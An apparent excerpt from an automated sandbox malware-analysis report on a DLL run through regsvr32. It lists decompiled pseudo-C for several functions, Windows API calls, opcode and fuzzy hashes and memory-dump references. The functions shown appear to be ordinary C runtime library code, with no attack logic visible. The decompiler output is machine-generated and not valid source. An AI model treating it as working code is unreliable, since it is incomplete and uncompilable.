				signed long long _t121;
				signed long long _t131;
				signed char* _t137;
				void* _t152;
				signed long long _t155;
				signed long long _t159;
				void* _t163;
				void* _t166;

				_t166 = __r8;
				_a24 = __rbx;
				_a32 = __rbp;
				_t121 =  *0x8005d010; // 0xb03f6156e10
				_v48 = _t121 ^ _t163 - 0x00000040;
				_t133 = __rdx;
				_t50 = E0000000118002FAFC(__ecx, __eflags, _t121 ^ _t163 - 0x00000040);
				_t86 = _t50;
				if (_t50 != 0) goto 0x8003014e;
				E0000000118002FBA4(_t86, __esp, _t50, _t121 ^ _t163 - 0x00000040, __rdx, __rdx, __rdx, _t155);
				goto 0x8003038b;
				r15d = 1;
				if ( *0x8005d2b0 == _t86) goto 0x80030298;
				if (0 + r15d - 5 < 0) goto 0x80030160;
				_t4 = _t152 - 0xfde8; // -64999
				if (_t4 - r15d <= 0) goto 0x80030290;
				if (IsValidCodePage(??) == 0) goto 0x80030290;
				if (GetCPInfo(??, ??) == 0) goto 0x80030284;
				r8d = 0x101;
				memset(??, ??, ??);
				 *((intOrPtr*)(__rdx + 4)) = _t86;
				 *(__rdx + 0x220) = _t155;
				if (_v72 - r15d <= 0) goto 0x8003026d;
				_t137 =  &_v66;
				if (_v66 == sil) goto 0x8003020b;
				if (_t137[1] == sil) goto 0x8003020b;
				_t109 = ( *_t137 & 0x000000ff) - (_t137[1] & 0x000000ff);
				if (_t109 > 0) goto 0x80030202;
				 *(_t152 + __rdx + 0x18) =  *(_t152 + __rdx + 0x18) | 0x00000004;
				_t88 =  &_v72 + 1 + r15d;
				if (_t109 != 0) goto 0x800301f5;
				_t110 = _t137[2] - sil;
				if (_t110 != 0) goto 0x800301db;
				_t20 = _t133 + 0x1a; // 0x1a
				 *_t20 =  *_t20 | 0x00000008;
				if (_t110 != 0) goto 0x80030214;
				if (_t110 == 0) goto 0x80030259;
				if (_t110 == 0) goto 0x80030250;
				if (_t110 == 0) goto 0x80030247;
				if ( *((intOrPtr*)(__rdx + 4)) - 0x393 == r15d) goto 0x8003023e;
				goto 0x80030260;
				goto 0x80030260;
				goto 0x80030260;
				goto 0x80030260;
				_t131 =  *0x8004c5d0; // 0x18004c5f0
				 *(__rdx + 0x220) = _t131;
				 *((intOrPtr*)(__rdx + 8)) = r15d;
				goto 0x80030270;
				 *((intOrPtr*)(__rdx + 8)) = 0;
				memset(_t88, 0, 6);
				_t89 = _t88 + 6;
				goto 0x80030383;
				_t112 =  *0x8005ea3c; // 0x0
				if (_t112 != 0) goto 0x80030141;
				goto 0x8003038d;
				r8d = 0x101;
				memset(??, ??, ??);
				if ( *0x18005D2C0 == sil) goto 0x8003030f;
				if ( *0x18005D2C1 == sil) goto 0x8003030f;
				r8d =  *0x18005D2C0 & 0x000000ff;
				if (r8d - ( *0x18005D2C1 & 0x000000ff) > 0) goto 0x80030306;
				_t32 = _t166 + 1; // 0x81
				r10d = _t32;
				if (r10d - 0x101 >= 0) goto 0x80030306;
				r8d = r8d + r15d;
				 *(__r10 + __rdx + 0x18) =  *(__r10 + __rdx + 0x18) |  *0x8005d2a0;
				r10d = r10d + r15d;
				if (r8d - ( *0x18005D2C1 & 0x000000ff) <= 0) goto 0x800302e6;
				_t118 =  *0x18005D2C0 - sil;
				if (_t118 != 0) goto 0x800302cf;
				if (_t118 != 0) goto 0x800302c7;
				 *((intOrPtr*)(__rdx + 4)) = _t89;
				 *((intOrPtr*)(__rdx + 8)) = r15d;
				if (_t118 == 0) goto 0x80030354;
				if (_t118 == 0) goto 0x8003034b;
				if (_t118 == 0) goto 0x80030342;
				_t119 = _t89 - 0x393 - r15d;
				if (_t119 != 0) goto 0x8003035b;
				goto 0x8003035b;
				goto 0x8003035b;
				goto 0x8003035b;
				_t159 =  *0x8004c5d0; // 0x18004c5f0
				 *(__rdx + 0x220) = _t159;
				_t41 = _t133 + 0xc; // 0xc
				 *_t41 =  *((_t131 + _t131 * 2 << 4) - __rdx + 0x8005d2b0 + _t41 - 8) & 0x0000ffff;
				if (_t119 != 0) goto 0x80030372;
				E0000000118002FC34(__rdx, __rdx, (_t131 + _t131 * 2 << 4) - __rdx + 0x8005d2b0);
				return E000000011800010E0(0, 0, _v60 ^ _t163 - 0x00000040);
			}



























                                                                                                    0x18003010c
                                                                                                    0x18003010c
                                                                                                    0x180030111
                                                                                                    0x180030122
                                                                                                    0x18003012c
                                                                                                    0x180030131
                                                                                                    0x180030134
                                                                                                    0x18003013b
                                                                                                    0x18003013f
                                                                                                    0x180030144
                                                                                                    0x180030149
                                                                                                    0x18003015a
                                                                                                    0x180030162
                                                                                                    0x180030172
                                                                                                    0x180030174
                                                                                                    0x18003017d
                                                                                                    0x18003018e
                                                                                                    0x1800301a3
                                                                                                    0x1800301af
                                                                                                    0x1800301b5
                                                                                                    0x1800301ba
                                                                                                    0x1800301bd
                                                                                                    0x1800301c9
                                                                                                    0x1800301cf
                                                                                                    0x1800301d9
                                                                                                    0x1800301df
                                                                                                    0x1800301e8
                                                                                                    0x1800301ea
                                                                                                    0x1800301f5
                                                                                                    0x1800301fa
                                                                                                    0x180030200
                                                                                                    0x180030206
                                                                                                    0x180030209
                                                                                                    0x18003020b
                                                                                                    0x180030214
                                                                                                    0x18003021d
                                                                                                    0x180030228
                                                                                                    0x18003022d
                                                                                                    0x180030232
                                                                                                    0x180030237
                                                                                                    0x18003023c
                                                                                                    0x180030245
                                                                                                    0x18003024e
                                                                                                    0x180030257
                                                                                                    0x180030259
                                                                                                    0x180030260
                                                                                                    0x180030267
                                                                                                    0x18003026b
                                                                                                    0x18003026d
                                                                                                    0x18003027c
                                                                                                    0x18003027c
                                                                                                    0x18003027f
                                                                                                    0x180030284
                                                                                                    0x18003028a
                                                                                                    0x180030293
                                                                                                    0x18003029e
                                                                                                    0x1800302a4
                                                                                                    0x1800302cd
                                                                                                    0x1800302d3
                                                                                                    0x1800302d5
                                                                                                    0x1800302e0
                                                                                                    0x1800302e2
                                                                                                    0x1800302e2
                                                                                                    0x1800302ed
                                                                                                    0x1800302f2
                                                                                                    0x1800302f5
                                                                                                    0x1800302fa
                                                                                                    0x180030304
                                                                                                    0x18003030a
                                                                                                    0x18003030d
                                                                                                    0x180030319
                                                                                                    0x18003031b
                                                                                                    0x18003031e
                                                                                                    0x180030328
                                                                                                    0x18003032d
                                                                                                    0x180030332
                                                                                                    0x180030334
                                                                                                    0x180030337
                                                                                                    0x180030340
                                                                                                    0x180030349
                                                                                                    0x180030352
                                                                                                    0x180030354
                                                                                                    0x18003035e
                                                                                                    0x180030365
                                                                                                    0x180030377
                                                                                                    0x180030381
                                                                                                    0x180030386
                                                                                                    0x1800303b2

                                                                                                    APIs
                                                                                                      • Part of subcall function 000000018002FAFC: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,000000018002FE41,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002FB26
                                                                                                    • IsValidCodePage.KERNEL32(?,?,?,00000000,?,00000000,00000001,000000018002FEF4,?,?,?,?,?,?,?,000000018002FFE9), ref: 0000000180030186
                                                                                                    • GetCPInfo.KERNEL32(?,?,?,00000000,?,00000000,00000001,000000018002FEF4,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018003019B
                                                                                                    • memset.NTDLL(?,?,?,00000000,?,00000000,00000001,000000018002FEF4,?,?,?,?,?,?,?,000000018002FFE9), ref: 00000001800301B5
                                                                                                      • Part of subcall function 000000018002FBA4: memset.NTDLL(?,?,00000001,0000000180030149,?,?,?,00000000,?,00000000,00000001,000000018002FEF4), ref: 000000018002FBCC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$CodeInfoPageValid
                                                                                                    • String ID:
                                                                                                    • API String ID: 344587817-0
                                                                                                    • Opcode ID: ffbfced209139df1265f90b22bc394ec14dc70d193398f4612259cd15469dcc0
                                                                                                    • Instruction ID: 34e1fee8ba003afc7cec202db385a8773e4809828ddb3d3ad848846442bd11da
                                                                                                    • Opcode Fuzzy Hash: ffbfced209139df1265f90b22bc394ec14dc70d193398f4612259cd15469dcc0
                                                                                                    • Instruction Fuzzy Hash: 8681D47220668885F7E38BA594643EF7795F34CBC4F6AC112FA4A46694DF39CB89C340
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180038E5C Relevance: 6.1, APIs: 4, Instructions: 126COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$StringTypememset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3507658028-0
                                                                                                    • Opcode ID: f5b4cddda006fe1495b964092fc1c63e4edba3fbf72a7b0e08c39e493d8d4f5a
                                                                                                    • Instruction ID: c49477500c972597d230da20563906d13c2280c1c70e6b36158dec487a3de875
                                                                                                    • Opcode Fuzzy Hash: f5b4cddda006fe1495b964092fc1c63e4edba3fbf72a7b0e08c39e493d8d4f5a
                                                                                                    • Instruction Fuzzy Hash: 2A418632311B884AEFA38F65D8007DA6391FB48BE8F498665BE5D477D4EF38D6498304
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180030988 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00000001800105CB,?,?,?,000000018001053E,?,?,?,00000001800104E5), ref: 00000001800309A1
                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00000001800105CB,?,?,?,000000018001053E,?,?,?,00000001800104E5), ref: 0000000180030A03
                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00000001800105CB,?,?,?,000000018001053E,?,?,?,00000001800104E5), ref: 0000000180030A3D
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00000001800105CB,?,?,?,000000018001053E,?,?,?,00000001800104E5), ref: 0000000180030A67
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1557788787-0
                                                                                                    • Opcode ID: 797f3c858d8cc0c05ed07f9a9981de71cd5ad88a1c7f783d5b28bd398df2b631
                                                                                                    • Instruction ID: 646b9c8ebb7b6f8cf59ff580cbe26ca617e89e5f419af44f504af6d67051fb8d
                                                                                                    • Opcode Fuzzy Hash: 797f3c858d8cc0c05ed07f9a9981de71cd5ad88a1c7f783d5b28bd398df2b631
                                                                                                    • Instruction Fuzzy Hash: 8F21E631B05B9481F6A29F12745035AB7A4F74DBD0F1D8125EE9E23BD5DF38C6558304
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002CD10 Relevance: 6.1, APIs: 4, Instructions: 64libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: b98965cef6599f2184b97cb37bfb35a4098967fc3b620daffc00bf0aa417ee17
                                                                                                    • Instruction ID: bba4b8786878a0c11c8c59b28da38e95a4c3d17cbb89a62a5d2feda1583cb5c6
                                                                                                    • Opcode Fuzzy Hash: b98965cef6599f2184b97cb37bfb35a4098967fc3b620daffc00bf0aa417ee17
                                                                                                    • Instruction Fuzzy Hash: 9F219536316A4881FDD79B159440B996B94BB0DBF0F198B34AE79067D0EE38C6498305
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180049330 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: floor
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192247854-0
                                                                                                    • Opcode ID: 76682fef03583298f508cb815f56a83b299fbde8d5f5db4fea172968043ddc61
                                                                                                    • Instruction ID: d2651591976613697eccd8c5a5392e7c2c044d1b0f51eafb4e12f2b8ed5e377a
                                                                                                    • Opcode Fuzzy Hash: 76682fef03583298f508cb815f56a83b299fbde8d5f5db4fea172968043ddc61
                                                                                                    • Instruction Fuzzy Hash: 58216626924FC849E3434B3895027E4F3A4AF7D7E9F199312BA45B2736EF21D9938740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002CF94 Relevance: 6.1, APIs: 4, Instructions: 55libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: 406b784aedc4e80b3bca2f0c07ad182368c16037c3408b8633160f66c0f4c2c8
                                                                                                    • Instruction ID: 79dc182c9ba32510d1844da7d101a8a2e057c8791a1cd18f5fa533b29d59e86c
                                                                                                    • Opcode Fuzzy Hash: 406b784aedc4e80b3bca2f0c07ad182368c16037c3408b8633160f66c0f4c2c8
                                                                                                    • Instruction Fuzzy Hash: FA11D231215B4881EE97DB2694447A923A0FB4CBF4F198725EE2D477E0CF78CA468304
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180043820 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 25%
                                                                                                    			E00000001180043820(void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, void* _a8, void* _a16, signed int _a32, intOrPtr _a36) {
				void* _v24;
				void* _t45;
				void* _t50;
				void* _t55;

				_t35 = __rax;
				_t55 = _t50;
				 *((long long*)(_t55 + 8)) = __rbx;
				 *((long long*)(_t55 + 0x10)) = __rsi;
				_a32 = _a32 & 0x00000000;
				_a36 = 0;
				_t8 = _t35 + 1; // 0x1
				r9d = _t8;
				if (SetFilePointerEx(_t45, ??, ??) != 0) goto 0x8004386c;
				E0000000118002E62C(GetLastError(), __edx, __rax, __rcx, __edx, _t55 - 0x18);
				goto 0x800438bf;
				_a32 = _a32 & 0x00000000;
				r9d = r8d;
				_a36 = 0;
				if (SetFilePointerEx(??, ??, ??, ??) == 0) goto 0x8004385a;
				if (_a32 - 0x7fffffff <= 0) goto 0x800438bb;
				r9d = 0;
				r8d = 0;
				SetFilePointerEx(??, ??, ??, ??);
				E0000000118002E69C(__rax);
				 *__rax = 0x16;
				goto 0x80043867;
				return _a32;
			}







                                                                                                    0x180043820
                                                                                                    0x180043820
                                                                                                    0x180043823
                                                                                                    0x180043827
                                                                                                    0x180043830
                                                                                                    0x18004383d
                                                                                                    0x18004384c
                                                                                                    0x18004384c
                                                                                                    0x180043858
                                                                                                    0x180043862
                                                                                                    0x18004386a
                                                                                                    0x18004386c
                                                                                                    0x18004387b
                                                                                                    0x18004387e
                                                                                                    0x18004388d
                                                                                                    0x180043898
                                                                                                    0x18004389f
                                                                                                    0x1800438a2
                                                                                                    0x1800438a8
                                                                                                    0x1800438ae
                                                                                                    0x1800438b3
                                                                                                    0x1800438b9
                                                                                                    0x1800438ce

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 142388799-0
                                                                                                    • Opcode ID: f9bf29c94d8121f58dcbea4e0e2a061fc8742977bca5fc74b3f795b2304ae3d7
                                                                                                    • Instruction ID: 1321a5dbed4fa70f0c1404dc6d8b34650451eb93c8c5b3a8a9887ce924abbfc3
                                                                                                    • Opcode Fuzzy Hash: f9bf29c94d8121f58dcbea4e0e2a061fc8742977bca5fc74b3f795b2304ae3d7
                                                                                                    • Instruction Fuzzy Hash: 4411C472614A8486F7918F65E88579AF7A0F74CBE8F119125FB5483B95CF7CC9088B04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002C43C Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 68%
                                                                                                    			E0000000118002C43C(void* __rax, long long __rbx, long long _a8) {
				void* _t4;
				void* _t9;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t23;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t33;

				_t25 = __rbx;
				_t23 = __rax;
				_a8 = __rbx;
				GetLastError();
				_t11 =  *0x8005d050; // 0xffffffff
				if (_t11 == 0xffffffff) goto 0x8002c466;
				_t4 = E0000000118002D43C(_t11, _t11 - 0xffffffff, __rax, __rbx, _t27);
				if (__rax != 0) goto 0x8002c4a7;
				E0000000118002E7AC(_t4, _t27, _t29);
				_t32 = _t23;
				if (_t23 != 0) goto 0x8002c486;
				E0000000118002E8A0(_t23, _t27);
				goto 0x8002c4c2;
				_t14 =  *0x8005d050; // 0xffffffff
				if (E0000000118002D494(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x8002c47f;
				E0000000118002BF58(_t32, _t23);
				_t9 = E0000000118002E8A0(_t23, _t32);
				if (_t32 == 0) goto 0x8002c4c2;
				SetLastError(??);
				return _t9;
			}












                                                                                                    0x18002c43c
                                                                                                    0x18002c43c
                                                                                                    0x18002c43c
                                                                                                    0x18002c446
                                                                                                    0x18002c44c
                                                                                                    0x18002c457
                                                                                                    0x18002c459
                                                                                                    0x18002c464
                                                                                                    0x18002c470
                                                                                                    0x18002c475
                                                                                                    0x18002c47b
                                                                                                    0x18002c47f
                                                                                                    0x18002c484
                                                                                                    0x18002c486
                                                                                                    0x18002c499
                                                                                                    0x18002c49b
                                                                                                    0x18002c4a2
                                                                                                    0x18002c4aa
                                                                                                    0x18002c4ae
                                                                                                    0x18002c4c1

                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C446
                                                                                                    • SetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C4AE
                                                                                                    • SetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C4C4
                                                                                                    • abort.LIBCMT ref: 000000018002C4CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 1447195878-0
                                                                                                    • Opcode ID: 852f3ee6d36f079354f08141842d8a44249f6979232d31937ee43aa82c86473f
                                                                                                    • Instruction ID: 53f1ca2d29ed7db8e81a9b5b6a879574e35d60638cac193613a92fa76e2d383e
                                                                                                    • Opcode Fuzzy Hash: 852f3ee6d36f079354f08141842d8a44249f6979232d31937ee43aa82c86473f
                                                                                                    • Instruction Fuzzy Hash: 01019A3030168C02FAEBB330A565BEE13426B4DBD0F54892AFD1A06BD2ED289B4C8305
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180034E74 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 66%
                                                                                                    			E00000001180034E74(void* __edx, long long __rbx, unsigned int* __rcx, signed long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, char* _a40, intOrPtr _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72) {
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v48;
				intOrPtr _v56;
				int _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				long long _v104;
				void* _t62;
				void* _t65;
				void* _t68;
				char _t69;
				char _t72;
				signed char _t74;
				void* _t85;
				intOrPtr _t86;
				void* _t87;
				void* _t121;
				intOrPtr* _t136;
				char* _t140;
				long long _t168;
				signed long long _t171;
				intOrPtr* _t175;
				char* _t176;
				signed long long _t181;
				void* _t182;
				signed long long _t189;
				signed long long _t191;
				signed long long _t194;
				signed long long _t198;
				intOrPtr* _t199;
				char* _t200;
				intOrPtr* _t201;
				char* _t202;
				char* _t205;
				void* _t206;
				char* _t207;
				char* _t208;
				char* _t209;
				char* _t210;
				unsigned int* _t213;
				void* _t216;
				intOrPtr* _t218;
				char* _t224;
				int _t232;
				int _t234;
				intOrPtr* _t236;
				void* _t238;

				_t168 = __rbx;
				_t136 = _t218;
				 *((long long*)(_t136 + 8)) = __rbx;
				 *((long long*)(_t136 + 0x10)) = __rbp;
				 *((long long*)(_t136 + 0x18)) = __rsi;
				 *((long long*)(_t136 + 0x20)) = __rdi;
				r12d = 0;
				_t198 = __rdx;
				 *((intOrPtr*)(__rdx)) = r12b;
				_t213 = __rcx;
				_t171 = _t136 - 0x38;
				_t216 = __r8;
				_t85 =  <  ? r12d : _a48;
				E00000001180018238(_t136, __rbx, _t171, _a72);
				if (__r8 - _t168 + 0xb > 0) goto 0x80034ee2;
				_t62 = E0000000118002E69C(_t136);
				_t9 = _t232 + 0x22; // 0x22
				_t86 = _t9;
				 *_t136 = _t86;
				E0000000118002E4F0(_t62);
				goto 0x8003519d;
				if (( *__rcx >> 0x00000034 & _t171) != _t171) goto 0x80034f6d;
				_v72 = _t232;
				_v80 = _a64;
				_t189 = _t198;
				_t140 = _a40;
				_v88 = r12b;
				_v96 = _t86;
				_v104 = _t140;
				_t65 = E000000011800351D4(_t168, __rcx, _t189, __rcx, __r8);
				_t87 = _t65;
				if (_t65 == 0) goto 0x80034f3b;
				 *_t198 = r12b;
				goto 0x8003519d;
				0x80046f5d();
				if (_t140 == 0) goto 0x8003519a;
				asm("sbb dl, dl");
				 *_t140 = 0xd0;
				 *((intOrPtr*)(_t140 + 3)) = r12b;
				goto 0x8003519a;
				if (( *_t213 & 0x00000000) == 0) goto 0x80034f82;
				 *_t198 = 0x2d;
				_t199 = _t198 + 1;
				r15b = _a56;
				r10d = 0x30;
				asm("sbb edx, edx");
				if (( *_t213 & 0x00000000) != 0) goto 0x80034fd5;
				 *_t199 = r10b;
				_t200 = _t199 + 1;
				asm("dec eax");
				goto 0x80034fdb;
				 *_t200 = 0x31;
				_t201 = _t200 + 1;
				_t236 = _t201;
				_t202 = _t201 + 1;
				if (_t87 != 0) goto 0x80034fea;
				 *_t236 = r12b;
				goto 0x80034ffe;
				 *_t236 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xf8))))));
				if (( *_t213 & 0xffffffff) <= 0) goto 0x80035091;
				r8d = r10w & 0xffffffff;
				if (_t87 <= 0) goto 0x80035047;
				_t68 =  ~r15b + r10w;
				_t121 = _t68 - 0x39;
				if (_t121 <= 0) goto 0x80035035;
				_t69 = _t68 + 0xffffffff000000e7;
				 *_t202 = _t69;
				_t203 = _t202 + 1;
				r8w = r8w + 0xfffc;
				if (_t121 >= 0) goto 0x80035015;
				if (r8w < 0) goto 0x80035091;
				if (_t69 - 8 <= 0) goto 0x80035091;
				_t28 = _t203 - 1; // 0x2
				_t175 = _t28;
				if (( *_t175 - 0x00000046 & 0x000000df) != 0) goto 0x80035076;
				 *_t175 = r10b;
				_t176 = _t175 - 1;
				goto 0x80035066;
				if (_t176 == _t236) goto 0x8003508e;
				_t72 =  *_t176;
				if (_t72 != 0x39) goto 0x80035088;
				 *_t176 = 0xffffffff00000121;
				goto 0x80035091;
				 *_t176 = _t72 + 1;
				goto 0x80035091;
				 *((char*)(_t176 - 1)) =  *((char*)(_t176 - 1)) + 1;
				if (_t87 - 1 <= 0) goto 0x800350ac;
				_t74 = memset(_t238, _t234, _t232);
